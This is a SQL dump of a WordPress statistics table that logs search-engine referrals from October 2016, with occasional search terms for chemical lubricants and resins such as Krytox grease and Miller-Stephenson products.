INSERT INTO `wp_statistics_search` VALUES (2339, '2016-10-21', 'google', 'www.google.com', '', 9723); 
INSERT INTO `wp_statistics_search` VALUES (2340, '2016-10-21', 'google', 'www.google.com', '', 9724); 
INSERT INTO `wp_statistics_search` VALUES (2341, '2016-10-21', 'google', 'www.google.ca', '', 9725); 
INSERT INTO `wp_statistics_search` VALUES (2342, '2016-10-21', 'google', 'www.google.com', '', 9728); 
INSERT INTO `wp_statistics_search` VALUES (2343, '2016-10-21', 'google', 'www.google.com', '', 9729); 
INSERT INTO `wp_statistics_search` VALUES (2344, '2016-10-21', 'bing', 'www.bing.com', 'm/s quick-freeze sds', 9733); 
INSERT INTO `wp_statistics_search` VALUES (2345, '2016-10-21', 'google', 'www.google.com', '', 9734); 
INSERT INTO `wp_statistics_search` VALUES (2346, '2016-10-21', 'google', 'www.google.com', '', 9737); 
INSERT INTO `wp_statistics_search` VALUES (2347, '2016-10-21', 'google', 'www.google.com', '', 9738); 
INSERT INTO `wp_statistics_search` VALUES (2348, '2016-10-21', 'google', 'www.google.com', '', 9739); 
INSERT INTO `wp_statistics_search` VALUES (2349, '2016-10-21', 'google', 'www.google.com.ar', '', 9744); 
INSERT INTO `wp_statistics_search` VALUES (2350, '2016-10-21', 'google', 'www.google.com', '', 9745); 
INSERT INTO `wp_statistics_search` VALUES (2351, '2016-10-21', 'google', 'www.google.com.br', '', 9749); 
INSERT INTO `wp_statistics_search` VALUES (2352, '2016-10-21', 'google', 'www.google.com', '', 9752); 
INSERT INTO `wp_statistics_search` VALUES (2353, '2016-10-21', 'google', 'www.google.ca', '', 9755); 
INSERT INTO `wp_statistics_search` VALUES (2354, '2016-10-21', 'google', 'www.google.com', '', 9756); 
INSERT INTO `wp_statistics_search` VALUES (2355, '2016-10-21', 'google', 'www.google.com', '', 9757); 
INSERT INTO `wp_statistics_search` VALUES (2356, '2016-10-21', 'google', 'www.google.com', '', 9758); 
INSERT INTO `wp_statistics_search` VALUES (2357, '2016-10-21', 'google', 'www.google.com', '', 9763); 
INSERT INTO `wp_statistics_search` VALUES (2358, '2016-10-21', 'google', 'www.google.com', '', 9764); 
INSERT INTO `wp_statistics_search` VALUES (2359, '2016-10-21', 'google', 'www.google.com', '', 9767); 
INSERT INTO `wp_statistics_search` VALUES (2360, '2016-10-21', 'google', 'www.google.com', '', 9768); 
INSERT INTO `wp_statistics_search` VALUES (2361, '2016-10-21', 'google', 'www.google.com', '', 9769); 
INSERT INTO `wp_statistics_search` VALUES (2362, '2016-10-21', 'google', 'www.google.ca', '', 9770); 
INSERT INTO `wp_statistics_search` VALUES (2363, '2016-10-21', 'google', 'www.google.com', '', 9776); 
INSERT INTO `wp_statistics_search` VALUES (2364, '2016-10-21', 'google', 'www.google.bg', '', 9780); 
INSERT INTO `wp_statistics_search` VALUES (2365, '2016-10-21', 'bing', 'www.bing.com', '', 9782); 
INSERT INTO `wp_statistics_search` VALUES (2366, '2016-10-21', 'bing', 'www.bing.com', '', 9787); 
INSERT INTO `wp_statistics_search` VALUES (2367, '2016-10-21', 'bing', 'www.bing.com', 'cream/grease  dental handpiece lubricants', 9788); 
INSERT INTO `wp_statistics_search` VALUES (2368, '2016-10-21', 'google', 'www.google.com', '', 9791); 
INSERT INTO `wp_statistics_search` VALUES (2369, '2016-10-21', 'yahoo', 'r.search.yahoo.com', '', 9796); 
INSERT INTO `wp_statistics_search` VALUES (2370, '2016-10-21', 'google', 'www.google.com', '', 9797); 
INSERT INTO `wp_statistics_search` VALUES (2371, '2016-10-21', 'google', 'www.google.com', '', 9799); 
INSERT INTO `wp_statistics_search` VALUES (2372, '2016-10-21', 'google', 'www.google.ca', '', 9801); 
INSERT INTO `wp_statistics_search` VALUES (2373, '2016-10-21', 'google', 'www.google.com', '', 9802); 
INSERT INTO `wp_statistics_search` VALUES (2374, '2016-10-21', 'google', 'www.google.com', '', 9803); 
INSERT INTO `wp_statistics_search` VALUES (2375, '2016-10-21', 'google', 'www.google.com', '', 9807); 
INSERT INTO `wp_statistics_search` VALUES (2376, '2016-10-21', 'google', 'www.google.com', '', 9808); 
INSERT INTO `wp_statistics_search` VALUES (2377, '2016-10-21', 'google', 'www.google.com', '', 9812); 
INSERT INTO `wp_statistics_search` VALUES (2378, '2016-10-21', 'google', 'www.google.de', '', 9815); 
INSERT INTO `wp_statistics_search` VALUES (2379, '2016-10-21', 'google', 'www.google.com', '', 9821); 
INSERT INTO `wp_statistics_search` VALUES (2380, '2016-10-21', 'google', 'www.google.com', '', 9822); 
INSERT INTO `wp_statistics_search` VALUES (2381, '2016-10-21', 'google', 'www.google.ca', '', 9825); 
INSERT INTO `wp_statistics_search` VALUES (2382, '2016-10-21', 'google', 'www.google.com', '', 9826); 
INSERT INTO `wp_statistics_search` VALUES (2383, '2016-10-21', 'google', 'www.google.com', '', 9831); 
INSERT INTO `wp_statistics_search` VALUES (2384, '2016-10-21', 'google', 'www.google.com', '', 9835); 
INSERT INTO `wp_statistics_search` VALUES (2385, '2016-10-21', 'google', 'www.google.com', '', 9840); 
INSERT INTO `wp_statistics_search` VALUES (2386, '2016-10-21', 'google', 'www.google.com', '', 9841); 
INSERT INTO `wp_statistics_search` VALUES (2387, '2016-10-21', 'google', 'www.google.lt', '', 9845); 
INSERT INTO `wp_statistics_search` VALUES (2388, '2016-10-21', 'google', 'www.google.com', '', 9846); 
INSERT INTO `wp_statistics_search` VALUES (2389, '2016-10-21', 'google', 'www.google.ca', '', 9847); 
INSERT INTO `wp_statistics_search` VALUES (2390, '2016-10-21', 'google', 'www.google.com', '', 9848); 
INSERT INTO `wp_statistics_search` VALUES (2391, '2016-10-21', 'google', 'www.google.ca', '', 9851); 
INSERT INTO `wp_statistics_search` VALUES (2392, '2016-10-21', 'google', 'www.google.com', '', 9852); 
INSERT INTO `wp_statistics_search` VALUES (2393, '2016-10-21', 'google', 'www.google.com', '', 9855); 
INSERT INTO `wp_statistics_search` VALUES (2394, '2016-10-21', 'google', 'www.google.com', '', 9856); 
INSERT INTO `wp_statistics_search` VALUES (2395, '2016-10-21', 'google', 'www.google.com.pe', '', 9857); 
INSERT INTO `wp_statistics_search` VALUES (2396, '2016-10-21', 'google', 'www.google.com', '', 9860); 
INSERT INTO `wp_statistics_search` VALUES (2397, '2016-10-21', 'google', 'www.google.com', '', 9863); 
INSERT INTO `wp_statistics_search` VALUES (2398, '2016-10-21', 'google', 'www.google.com', '', 9869); 
INSERT INTO `wp_statistics_search` VALUES (2399, '2016-10-21', 'google', 'www.google.com', '', 9873); 
INSERT INTO `wp_statistics_search` VALUES (2400, '2016-10-21', 'google', 'www.google.com', '', 9877); 
INSERT INTO `wp_statistics_search` VALUES (2401, '2016-10-21', 'google', 'www.google.nl', '', 9881); 
INSERT INTO `wp_statistics_search` VALUES (2402, '2016-10-21', 'google', 'www.google.com', '', 9884); 
INSERT INTO `wp_statistics_search` VALUES (2403, '2016-10-21', 'google', 'www.google.fr', '', 9885); 
INSERT INTO `wp_statistics_search` VALUES (2404, '2016-10-21', 'google', 'www.google.com', '', 9892); 
INSERT INTO `wp_statistics_search` VALUES (2405, '2016-10-21', 'bing', 'www.bing.com', 'epikure w', 9893); 
INSERT INTO `wp_statistics_search` VALUES (2406, '2016-10-21', 'google', 'www.google.com', 'krytox grease', 9903); 
INSERT INTO `wp_statistics_search` VALUES (2407, '2016-10-21', 'google', 'www.google.ca', '', 9906); 
INSERT INTO `wp_statistics_search` VALUES (2408, '2016-10-22', 'google', 'www.google.com', '', 9910); 
INSERT INTO `wp_statistics_search` VALUES (2409, '2016-10-22', 'google', 'www.google.com', '', 9913); 
INSERT INTO `wp_statistics_search` VALUES (2410, '2016-10-22', 'google', 'www.google.com', '', 9914); 
INSERT INTO `wp_statistics_search` VALUES (2411, '2016-10-22', 'bing', 'www.bing.com', 'epon solid epoxy resin', 9938); 
INSERT INTO `wp_statistics_search` VALUES (2412, '2016-10-22', 'google', 'www.google.co.in', '', 9940); 
INSERT INTO `wp_statistics_search` VALUES (2413, '2016-10-22', 'google', 'www.google.ca', '', 9952); 
INSERT INTO `wp_statistics_search` VALUES (2414, '2016-10-22', 'google', 'www.google.com', '', 9954); 
INSERT INTO `wp_statistics_search` VALUES (2415, '2016-10-22', 'google', 'www.google.co.th', '', 9957); 
INSERT INTO `wp_statistics_search` VALUES (2416, '2016-10-22', 'google', 'www.google.com', '', 9961); 
INSERT INTO `wp_statistics_search` VALUES (2417, '2016-10-22', 'google', 'www.google.co.in', '', 9962); 
INSERT INTO `wp_statistics_search` VALUES (2418, '2016-10-22', 'google', 'www.google.co.in', '', 10022); 
INSERT INTO `wp_statistics_search` VALUES (2419, '2016-10-22', 'google', 'www.google.co.in', '', 10031); 
INSERT INTO `wp_statistics_search` VALUES (2420, '2016-10-22', 'google', 'www.google.com', '', 10036); 
INSERT INTO `wp_statistics_search` VALUES (2421, '2016-10-22', 'google', 'www.google.pl', '', 10048); 
INSERT INTO `wp_statistics_search` VALUES (2422, '2016-10-22', 'google', 'www.google.com', '', 10057); 
INSERT INTO `wp_statistics_search` VALUES (2423, '2016-10-22', 'google', 'www.google.com', '', 10059); 
INSERT INTO `wp_statistics_search` VALUES (2424, '2016-10-22', 'google', 'www.google.com', '', 10060); 
INSERT INTO `wp_statistics_search` VALUES (2425, '2016-10-22', 'google', 'www.google.pl', '', 10065); 
INSERT INTO `wp_statistics_search` VALUES (2426, '2016-10-22', 'google', 'www.google.com', '', 10068); 
INSERT INTO `wp_statistics_search` VALUES (2427, '2016-10-22', 'google', 'www.google.com', '', 10070); 
INSERT INTO `wp_statistics_search` VALUES (2428, '2016-10-22', 'google', 'www.google.com', '', 10071); 
INSERT INTO `wp_statistics_search` VALUES (2429, '2016-10-22', 'google', 'www.google.co.uk', '', 10076); 
INSERT INTO `wp_statistics_search` VALUES (2430, '2016-10-22', 'google', 'www.google.com', '', 10079); 
INSERT INTO `wp_statistics_search` VALUES (2431, '2016-10-22', 'yahoo', 'r.search.yahoo.com', '', 10080); 
INSERT INTO `wp_statistics_search` VALUES (2432, '2016-10-22', 'google', 'www.google.de', '', 10088); 
INSERT INTO `wp_statistics_search` VALUES (2433, '2016-10-22', 'google', 'www.google.com', '', 10101); 
INSERT INTO `wp_statistics_search` VALUES (2434, '2016-10-22', 'google', 'www.google.com', '', 10109); 
INSERT INTO `wp_statistics_search` VALUES (2435, '2016-10-22', 'google', 'www.google.com', '', 10115); 
INSERT INTO `wp_statistics_search` VALUES (2436, '2016-10-22', 'duckduckgo', 'duckduckgo.com', '', 10117); 
INSERT INTO `wp_statistics_search` VALUES (2437, '2016-10-22', 'google', 'www.google.com', '', 10128); 
INSERT INTO `wp_statistics_search` VALUES (2438, '2016-10-22', 'google', 'www.google.com', '', 10132); 
INSERT INTO `wp_statistics_search` VALUES (2439, '2016-10-22', 'bing', 'www.bing.com', 'heloxy modifier 62', 10134); 
INSERT INTO `wp_statistics_search` VALUES (2440, '2016-10-22', 'duckduckgo', 'r.duckduckgo.com', '', 10141); 
INSERT INTO `wp_statistics_search` VALUES (2441, '2016-10-22', 'google', 'www.google.co.uk', '', 10144); 
INSERT INTO `wp_statistics_search` VALUES (2442, '2016-10-22', 'google', 'www.google.com', '', 10146); 
INSERT INTO `wp_statistics_search` VALUES (2443, '2016-10-22', 'google', 'www.google.com', '', 10158); 
INSERT INTO `wp_statistics_search` VALUES (2444, '2016-10-22', 'google', 'www.google.co.uk', '', 10161); 
INSERT INTO `wp_statistics_search` VALUES (2445, '2016-10-22', 'google', 'www.google.co.uk', 'krytox 205', 10167); 
INSERT INTO `wp_statistics_search` VALUES (2446, '2016-10-22', 'google', 'www.google.com', '', 10169); 
INSERT INTO `wp_statistics_search` VALUES (2447, '2016-10-22', 'google', 'www.google.com', '', 10174); 
INSERT INTO `wp_statistics_search` VALUES (2448, '2016-10-22', 'google', 'www.google.com', '', 10176); 
INSERT INTO `wp_statistics_search` VALUES (2449, '2016-10-22', 'google', 'www.google.com', '', 10180); 
INSERT INTO `wp_statistics_search` VALUES (2450, '2016-10-23', 'bing', 'www.bing.com', 'miller siliconeoil', 10191); 
INSERT INTO `wp_statistics_search` VALUES (2451, '2016-10-23', 'google', 'www.google.com', '', 10202); 
INSERT INTO `wp_statistics_search` VALUES (2452, '2016-10-23', 'google', 'www.google.co.kr', '', 10203); 
INSERT INTO `wp_statistics_search` VALUES (2453, '2016-10-23', 'google', 'www.google.com', '', 10204); 
INSERT INTO `wp_statistics_search` VALUES (2454, '2016-10-23', 'google', 'www.google.com', '', 10208); 
INSERT INTO `wp_statistics_search` VALUES (2455, '2016-10-23', 'bing', 'www.bing.com', 'vazo 64', 10212); 
INSERT INTO `wp_statistics_search` VALUES (2456, '2016-10-23', 'google', 'www.google.com', '', 10219); 
INSERT INTO `wp_statistics_search` VALUES (2457, '2016-10-23', 'google', 'www.google.com', '', 10223); 
INSERT INTO `wp_statistics_search` VALUES (2458, '2016-10-23', 'google', 'www.google.com', '', 10231); 
INSERT INTO `wp_statistics_search` VALUES (2459, '2016-10-23', 'google', 'www.google.com.ph', '', 10240); 
INSERT INTO `wp_statistics_search` VALUES (2460, '2016-10-23', 'google', 'www.google.com', '', 10241); 
INSERT INTO `wp_statistics_search` VALUES (2461, '2016-10-23', 'google', 'www.google.com', 'monomer powders', 10246); 
INSERT INTO `wp_statistics_search` VALUES (2462, '2016-10-23', 'google', 'www.google.com.au', '', 10263); 
INSERT INTO `wp_statistics_search` VALUES (2463, '2016-10-23', 'yahoo', 'r.search.yahoo.com', '', 10267); 
INSERT INTO `wp_statistics_search` VALUES (2464, '2016-10-23', 'google', 'www.google.es', '', 10272); 
INSERT INTO `wp_statistics_search` VALUES (2465, '2016-10-23', 'google', 'www.google.com', '', 10277); 
INSERT INTO `wp_statistics_search` VALUES (2466, '2016-10-23', 'bing', 'www.bing.com', '', 10279); 
INSERT INTO `wp_statistics_search` VALUES (2467, '2016-10-23', 'google', 'www.google.com', '', 10285); 
INSERT INTO `wp_statistics_search` VALUES (2468, '2016-10-23', 'google', 'www.google.de', '', 10286); 
INSERT INTO `wp_statistics_search` VALUES (2469, '2016-10-23', 'google', 'www.google.com', '', 10287); 
INSERT INTO `wp_statistics_search` VALUES (2470, '2016-10-23', 'google', 'www.google.lt', '', 10300); 
INSERT INTO `wp_statistics_search` VALUES (2471, '2016-10-23', 'google', 'www.google.com', '', 10303); 
INSERT INTO `wp_statistics_search` VALUES (2472, '2016-10-23', 'google', 'www.google.co.uk', '', 10334); 
INSERT INTO `wp_statistics_search` VALUES (2473, '2016-10-23', 'google', 'www.google.com', '', 10342); 
INSERT INTO `wp_statistics_search` VALUES (2474, '2016-10-23', 'google', 'www.google.com', '', 10343); 
INSERT INTO `wp_statistics_search` VALUES (2475, '2016-10-23', 'google', 'www.google.com.tr', '', 10351); 
INSERT INTO `wp_statistics_search` VALUES (2476, '2016-10-23', 'google', 'www.google.com', '', 10352); 
INSERT INTO `wp_statistics_search` VALUES (2477, '2016-10-23', 'yahoo', 'r.search.yahoo.com', '', 10353); 
INSERT INTO `wp_statistics_search` VALUES (2478, '2016-10-23', 'yahoo', 'r.search.yahoo.com', '', 10358); 
INSERT INTO `wp_statistics_search` VALUES (2479, '2016-10-23', 'google', 'www.google.co.za', '', 10366); 
INSERT INTO `wp_statistics_search` VALUES (2480, '2016-10-23', 'google', 'www.google.com', '', 10402); 
INSERT INTO `wp_statistics_search` VALUES (2481, '2016-10-23', 'google', 'www.google.ca', '', 10406); 
INSERT INTO `wp_statistics_search` VALUES (2482, '2016-10-23', 'google', 'www.google.ie', '', 10414); 
INSERT INTO `wp_statistics_search` VALUES (2483, '2016-10-23', 'google', 'www.google.ae', '', 10420); 
INSERT INTO `wp_statistics_search` VALUES (2484, '2016-10-23', 'google', 'www.google.co.id', '', 10425); 
INSERT INTO `wp_statistics_search` VALUES (2485, '2016-10-23', 'yandex', 'yandex.ru', '', 10437); 
INSERT INTO `wp_statistics_search` VALUES (2486, '2016-10-23', 'google', 'www.google.com', '', 10445); 
INSERT INTO `wp_statistics_search` VALUES (2487, '2016-10-23', 'google', 'www.google.com', '', 10453); 
INSERT INTO `wp_statistics_search` VALUES (2488, '2016-10-23', 'google', 'www.google.com', '', 10467); 
INSERT INTO `wp_statistics_search` VALUES (2489, '2016-10-23', 'google', 'www.google.com', '', 10476); 
INSERT INTO `wp_statistics_search` VALUES (2490, '2016-10-23', 'google', 'www.google.com', '', 10486); 
INSERT INTO `wp_statistics_search` VALUES (2491, '2016-10-23', 'google', 'www.google.com', '', 10489); 
INSERT INTO `wp_statistics_search` VALUES (2492, '2016-10-23', 'google', 'www.google.com', '', 10490); 
INSERT INTO `wp_statistics_search` VALUES (2493, '2016-10-23', 'bing', 'www.bing.com', 'krytox eg 2000 specifications', 10491); 
INSERT INTO `wp_statistics_search` VALUES (2494, '2016-10-23', 'google', 'www.google.com.au', '', 10495); 
INSERT INTO `wp_statistics_search` VALUES (2495, '2016-10-23', 'google', 'www.google.com', '', 10505); 
INSERT INTO `wp_statistics_search` VALUES (2496, '2016-10-23', 'yandex', 'yandex.ru', '', 10506); 
INSERT INTO `wp_statistics_search` VALUES (2497, '2016-10-23', 'google', 'www.google.com.au', '', 10508); 
INSERT INTO `wp_statistics_search` VALUES (2498, '2016-10-23', 'google', 'www.google.com', '', 10511); 
INSERT INTO `wp_statistics_search` VALUES (2499, '2016-10-24', 'google', 'www.google.ca', '', 10514); 
INSERT INTO `wp_statistics_search` VALUES (2500, '2016-10-24', 'google', 'www.google.com.au', '', 10520); 
INSERT INTO `wp_statistics_search` VALUES (2501, '2016-10-24', 'google', 'www.google.com', '', 10558); 
INSERT INTO `wp_statistics_search` VALUES (2502, '2016-10-24', 'yahoo', 'r.search.yahoo.com', '', 10571); 
INSERT INTO `wp_statistics_search` VALUES (2503, '2016-10-24', 'google', 'www.google.com', '', 10586); 
INSERT INTO `wp_statistics_search` VALUES (2504, '2016-10-24', 'google', 'www.google.ca', '', 10589); 
INSERT INTO `wp_statistics_search` VALUES (2505, '2016-10-24', 'google', 'www.google.com.sg', '', 10593); 
INSERT INTO `wp_statistics_search` VALUES (2506, '2016-10-24', 'google', 'www.google.co.kr', '', 10594); 
INSERT INTO `wp_statistics_search` VALUES (2507, '2016-10-24', 'baidu', 'www.baidu.com', '', 10595); 
INSERT INTO `wp_statistics_search` VALUES (2508, '2016-10-24', 'google', 'www.google.co.in', '', 10599); 
INSERT INTO `wp_statistics_search` VALUES (2509, '2016-10-24', 'google', 'www.google.com', '', 10604); 
INSERT INTO `wp_statistics_search` VALUES (2510, '2016-10-24', 'bing', 'www.bing.com', 'miller stephenson', 10614); 
INSERT INTO `wp_statistics_search` VALUES (2511, '2016-10-24', 'google', 'www.google.co.in', '', 10641); 
INSERT INTO `wp_statistics_search` VALUES (2512, '2016-10-24', 'google', 'www.google.co.in', '', 10642); 
INSERT INTO `wp_statistics_search` VALUES (2513, '2016-10-24', 'google', 'www.google.co.in', '', 10643); 
INSERT INTO `wp_statistics_search` VALUES (2514, '2016-10-24', 'baidu', 'www.baidu.com', '', 10648); 
INSERT INTO `wp_statistics_search` VALUES (2515, '2016-10-24', 'google', 'www.google.co.kr', '', 10650); 
INSERT INTO `wp_statistics_search` VALUES (2516, '2016-10-24', 'google', 'www.google.com', '', 10651); 
INSERT INTO `wp_statistics_search` VALUES (2517, '2016-10-24', 'google', 'www.google.com.sg', '', 10673); 
INSERT INTO `wp_statistics_search` VALUES (2518, '2016-10-24', 'google', 'www.google.co.in', '', 10674); 
INSERT INTO `wp_statistics_search` VALUES (2519, '2016-10-24', 'google', 'www.google.ch', '', 10685); 
INSERT INTO `wp_statistics_search` VALUES (2520, '2016-10-24', 'google', 'www.google.com.tw', '', 10697); 
INSERT INTO `wp_statistics_search` VALUES (2521, '2016-10-24', 'google', 'www.google.it', '', 10707); 
INSERT INTO `wp_statistics_search` VALUES (2522, '2016-10-24', 'yandex', 'yandex.ru', '', 10709); 
INSERT INTO `wp_statistics_search` VALUES (2523, '2016-10-24', 'google', 'www.google.de', '', 10722); 
INSERT INTO `wp_statistics_search` VALUES (2524, '2016-10-24', 'google', 'www.google.co.uk', '', 10724); 
INSERT INTO `wp_statistics_search` VALUES (2525, '2016-10-24', 'google', 'www.google.co.in', '', 10731); 
INSERT INTO `wp_statistics_search` VALUES (2526, '2016-10-24', 'google', 'www.google.co.kr', '', 10740); 
INSERT INTO `wp_statistics_search` VALUES (2527, '2016-10-24', 'google', 'www.google.com', '', 10749); 
INSERT INTO `wp_statistics_search` VALUES (2528, '2016-10-24', 'google', 'www.google.com', '', 10754); 
INSERT INTO `wp_statistics_search` VALUES (2529, '2016-10-24', 'google', 'www.google.ca', '', 10765); 
INSERT INTO `wp_statistics_search` VALUES (2530, '2016-10-24', 'google', 'www.google.nl', '', 10766); 
INSERT INTO `wp_statistics_search` VALUES (2531, '2016-10-24', 'google', 'www.google.co.za', '', 10767); 
INSERT INTO `wp_statistics_search` VALUES (2532, '2016-10-24', 'google', 'www.google.com', '', 10769); 
INSERT INTO `wp_statistics_search` VALUES (2533, '2016-10-24', 'google', 'images.google.de', '', 10776); 
INSERT INTO `wp_statistics_search` VALUES (2534, '2016-10-24', 'google', 'www.google.ch', '', 10780); 
INSERT INTO `wp_statistics_search` VALUES (2535, '2016-10-24', 'google', 'www.google.com', '', 10790); 
INSERT INTO `wp_statistics_search` VALUES (2536, '2016-10-24', 'google', 'www.google.com', '', 10791); 
INSERT INTO `wp_statistics_search` VALUES (2537, '2016-10-24', 'google', 'www.google.pl', '', 10794); 
INSERT INTO `wp_statistics_search` VALUES (2538, '2016-10-24', 'google', 'www.google.com.ar', '', 10801); 
INSERT INTO `wp_statistics_search` VALUES (2539, '2016-10-24', 'google', 'www.google.com', '', 10825); 
INSERT INTO `wp_statistics_search` VALUES (2540, '2016-10-24', 'google', 'www.google.com', '', 10829); 
INSERT INTO `wp_statistics_search` VALUES (2541, '2016-10-24', 'google', 'www.google.com', '', 10833); 
INSERT INTO `wp_statistics_search` VALUES (2542, '2016-10-24', 'google', 'www.google.ca', '', 10836); 
INSERT INTO `wp_statistics_search` VALUES (2543, '2016-10-24', 'google', 'www.google.gr', '', 10837); 
INSERT INTO `wp_statistics_search` VALUES (2544, '2016-10-24', 'google', 'www.google.de', '', 10841); 
INSERT INTO `wp_statistics_search` VALUES (2545, '2016-10-24', 'google', 'www.google.com', '', 10844); 
INSERT INTO `wp_statistics_search` VALUES (2546, '2016-10-24', 'google', 'www.google.com', '', 10847); 
INSERT INTO `wp_statistics_search` VALUES (2547, '2016-10-24', 'bing', 'www.bing.com', 'ms-122AD', 10849); 
INSERT INTO `wp_statistics_search` VALUES (2548, '2016-10-24', 'bing', 'www.bing.com', 'miller-stephenson', 10864); 
INSERT INTO `wp_statistics_search` VALUES (2549, '2016-10-24', 'google', 'www.google.com', '', 10877); 
INSERT INTO `wp_statistics_search` VALUES (2550, '2016-10-24', 'google', 'www.google.com', '', 10878); 
INSERT INTO `wp_statistics_search` VALUES (2551, '2016-10-24', 'google', 'www.google.it', '', 10883); 
INSERT INTO `wp_statistics_search` VALUES (2552, '2016-10-24', 'google', 'www.google.com.tw', '', 10885); 
INSERT INTO `wp_statistics_search` VALUES (2553, '2016-10-24', 'google', 'www.google.com', '', 10887); 
INSERT INTO `wp_statistics_search` VALUES (2554, '2016-10-24', 'google', 'www.google.com', '', 10890); 
INSERT INTO `wp_statistics_search` VALUES (2555, '2016-10-24', 'google', 'www.google.com', '', 10891); 
INSERT INTO `wp_statistics_search` VALUES (2556, '2016-10-24', 'bing', 'www.bing.com', '3140 curing agent', 10898); 
INSERT INTO `wp_statistics_search` VALUES (2557, '2016-10-24', 'google', 'www.google.com', '', 10899); 
INSERT INTO `wp_statistics_search` VALUES (2558, '2016-10-24', 'google', 'www.google.com.tw', '', 10902); 
INSERT INTO `wp_statistics_search` VALUES (2559, '2016-10-24', 'google', 'www.google.com', '', 10904); 
INSERT INTO `wp_statistics_search` VALUES (2560, '2016-10-24', 'google', 'www.google.com', '', 10905); 
INSERT INTO `wp_statistics_search` VALUES (2561, '2016-10-24', 'google', 'www.google.com.ec', '', 10907); 
INSERT INTO `wp_statistics_search` VALUES (2562, '2016-10-24', 'google', 'www.google.com', '', 10911); 
INSERT INTO `wp_statistics_search` VALUES (2563, '2016-10-24', 'google', 'www.google.com', '', 10917); 
INSERT INTO `wp_statistics_search` VALUES (2564, '2016-10-24', 'bing', 'www.bing.com', '', 10918); 
INSERT INTO `wp_statistics_search` VALUES (2565, '2016-10-24', 'google', 'www.google.com', '', 10920); 
INSERT INTO `wp_statistics_search` VALUES (2566, '2016-10-24', 'google', 'www.google.com', '', 10922); 
INSERT INTO `wp_statistics_search` VALUES (2567, '2016-10-24', 'google', 'www.google.com', '', 10926); 
INSERT INTO `wp_statistics_search` VALUES (2568, '2016-10-24', 'google', 'www.google.ca', '', 10927); 
INSERT INTO `wp_statistics_search` VALUES (2569, '2016-10-24', 'google', 'www.google.com', '', 10937); 
INSERT INTO `wp_statistics_search` VALUES (2570, '2016-10-24', 'google', 'www.google.com', '', 10939); 
INSERT INTO `wp_statistics_search` VALUES (2571, '2016-10-24', 'google', 'www.google.co.kr', '', 10941); 
INSERT INTO `wp_statistics_search` VALUES (2572, '2016-10-24', 'google', 'www.google.com', '', 10943); 
INSERT INTO `wp_statistics_search` VALUES (2573, '2016-10-24', 'google', 'www.google.com', '', 10946); 
INSERT INTO `wp_statistics_search` VALUES (2574, '2016-10-24', 'google', 'www.google.de', '', 10948); 
INSERT INTO `wp_statistics_search` VALUES (2575, '2016-10-24', 'google', 'www.google.com', '', 10951); 
INSERT INTO `wp_statistics_search` VALUES (2576, '2016-10-24', 'google', 'www.google.com', '', 10952); 
INSERT INTO `wp_statistics_search` VALUES (2577, '2016-10-24', 'google', 'www.google.nl', '', 10954); 
INSERT INTO `wp_statistics_search` VALUES (2578, '2016-10-24', 'google', 'www.google.com.co', '', 10962); 
INSERT INTO `wp_statistics_search` VALUES (2579, '2016-10-24', 'google', 'www.google.com', '', 10980); 
INSERT INTO `wp_statistics_search` VALUES (2580, '2016-10-24', 'google', 'www.google.ca', '', 10981); 
INSERT INTO `wp_statistics_search` VALUES (2581, '2016-10-24', 'google', 'www.google.com', '', 10982); 
INSERT INTO `wp_statistics_search` VALUES (2582, '2016-10-24', 'google', 'www.google.com', '', 10983); 
INSERT INTO `wp_statistics_search` VALUES (2583, '2016-10-24', 'google', 'www.google.com', '', 10985); 
INSERT INTO `wp_statistics_search` VALUES (2584, '2016-10-24', 'bing', 'www.bing.com', 'MS-222N', 10986); 
INSERT INTO `wp_statistics_search` VALUES (2585, '2016-10-24', 'bing', 'www.bing.com', 'MS-222N', 10987); 
INSERT INTO `wp_statistics_search` VALUES (2586, '2016-10-24', 'bing', 'www.bing.com', 'MS-222N', 10988); 
INSERT INTO `wp_statistics_search` VALUES (2587, '2016-10-24', 'google', 'www.google.com', '', 10989); 
INSERT INTO `wp_statistics_search` VALUES (2588, '2016-10-24', 'google', 'www.google.com', '', 10991); 
INSERT INTO `wp_statistics_search` VALUES (2589, '2016-10-24', 'google', 'www.google.com', '', 10992); 
INSERT INTO `wp_statistics_search` VALUES (2590, '2016-10-24', 'google', 'www.google.pt', '', 10995); 
INSERT INTO `wp_statistics_search` VALUES (2591, '2016-10-24', 'google', 'www.google.com', '', 10996); 
INSERT INTO `wp_statistics_search` VALUES (2592, '2016-10-24', 'google', 'www.google.ca', '', 10997); 
INSERT INTO `wp_statistics_search` VALUES (2593, '2016-10-24', 'google', 'www.google.com', '', 10998); 
INSERT INTO `wp_statistics_search` VALUES (2594, '2016-10-24', 'google', 'www.google.es', '', 11000); 
INSERT INTO `wp_statistics_search` VALUES (2595, '2016-10-24', 'bing', 'www.bing.com', '', 11001); 
INSERT INTO `wp_statistics_search` VALUES (2596, '2016-10-24', 'google', 'www.google.com', '', 11002); 
INSERT INTO `wp_statistics_search` VALUES (2597, '2016-10-24', 'google', 'www.google.com', '', 11005); 
INSERT INTO `wp_statistics_search` VALUES (2598, '2016-10-24', 'bing', 'www.bing.com', 'miller-stephenson chemical co', 11009); 
INSERT INTO `wp_statistics_search` VALUES (2599, '2016-10-24', 'google', 'www.google.com', '', 11012); 
INSERT INTO `wp_statistics_search` VALUES (2600, '2016-10-24', 'google', 'www.google.com', '', 11018); 
INSERT INTO `wp_statistics_search` VALUES (2601, '2016-10-24', 'bing', 'www.bing.com', '', 11019); 
INSERT INTO `wp_statistics_search` VALUES (2602, '2016-10-24', 'google', 'www.google.com', '', 11021); 
INSERT INTO `wp_statistics_search` VALUES (2603, '2016-10-24', 'google', 'www.google.com', '', 11022); 
INSERT INTO `wp_statistics_search` VALUES (2604, '2016-10-24', 'google', 'www.google.com', '', 11029); 
INSERT INTO `wp_statistics_search` VALUES (2605, '2016-10-24', 'google', 'www.google.com', '', 11031); 
INSERT INTO `wp_statistics_search` VALUES (2606, '2016-10-24', 'bing', 'www.bing.com', 'miller stephenson chemical', 11032); 
INSERT INTO `wp_statistics_search` VALUES (2607, '2016-10-24', 'google', 'www.google.com', '', 11035); 
INSERT INTO `wp_statistics_search` VALUES (2608, '2016-10-24', 'google', 'www.google.com', '', 11041); 
INSERT INTO `wp_statistics_search` VALUES (2609, '2016-10-24', 'yahoo', 'search.yahoo.com', '', 11042); 
INSERT INTO `wp_statistics_search` VALUES (2610, '2016-10-24', 'google', 'www.google.ca', '', 11045); 
INSERT INTO `wp_statistics_search` VALUES (2611, '2016-10-24', 'google', 'www.google.com', '', 11046); 
INSERT INTO `wp_statistics_search` VALUES (2612, '2016-10-24', 'google', 'www.google.com', '', 11051); 
